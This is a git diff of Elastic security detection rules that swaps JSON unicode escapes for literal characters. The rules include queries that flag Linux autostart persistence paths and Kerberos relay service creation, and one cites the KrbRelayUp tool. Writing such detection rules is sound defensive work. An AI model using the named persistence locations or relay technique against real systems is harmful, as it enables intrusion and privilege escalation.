index 5eca935e461..d99bc55872b 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json
index 38c207f4fcd..3d98514463c 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_105.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json
index fc1216003b3..5d383f85d94 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_106.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via KDE AutoStart Script or Desktop File Modification", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n ) and\n not process.name in (\"yum\", \"dpkg\", \"install\", \"dnf\", \"teams\", \"yum-cron\", \"dnf-automatic\", \"docker\", \"dockerd\", \n \"rpm\")\n", "references": [ 
"https://userbase.kde.org/System_Settings/Autostart",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json
index 94ce9efa03c..fba907f6477 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_107.json
@@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json index 54c7b3b59b1..61207d65f48 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_108.json 
@@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json index 09a89f0be91..49d8b4bff16 100644 --- a/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e468f3f6-7c4c-45bb-846a-053738b3fe5d_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json index 694c9d9c828..80194f4d94d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json index a89d31eb1a6..fb96830e6b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json index fdca0c22de8..7793e4f0601 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json index 6221bf310b2..19d4c13f1e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_105.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json index ea581bc2979..73a568a73e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json +++ b/packages/security_detection_engine/kibana/security_rule/e48236ca-b67a-4b4e-840c-fdc7782bc0c3_206.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json index 6bc26bff41d..84f32ca34e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_103.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Creation via Local Kerberos Authentication", - "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where host.os.type == \"windows\" and\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port \u003e 0] by winlog.event_data.TargetLogonId\n\n [any where host.os.type == \"windows\" and\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where host.os.type == \"windows\" and\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port > 0] by winlog.event_data.TargetLogonId\n\n [any where host.os.type == \"windows\" and\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", "references": [ "https://github.com/Dec0ne/KrbRelayUp", "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json index 6bbe8d49219..d31b47f7624 100644 --- a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Creation via Local Kerberos Authentication", - "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port \u003e 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by winlog.computer_name with maxspan=5m\n 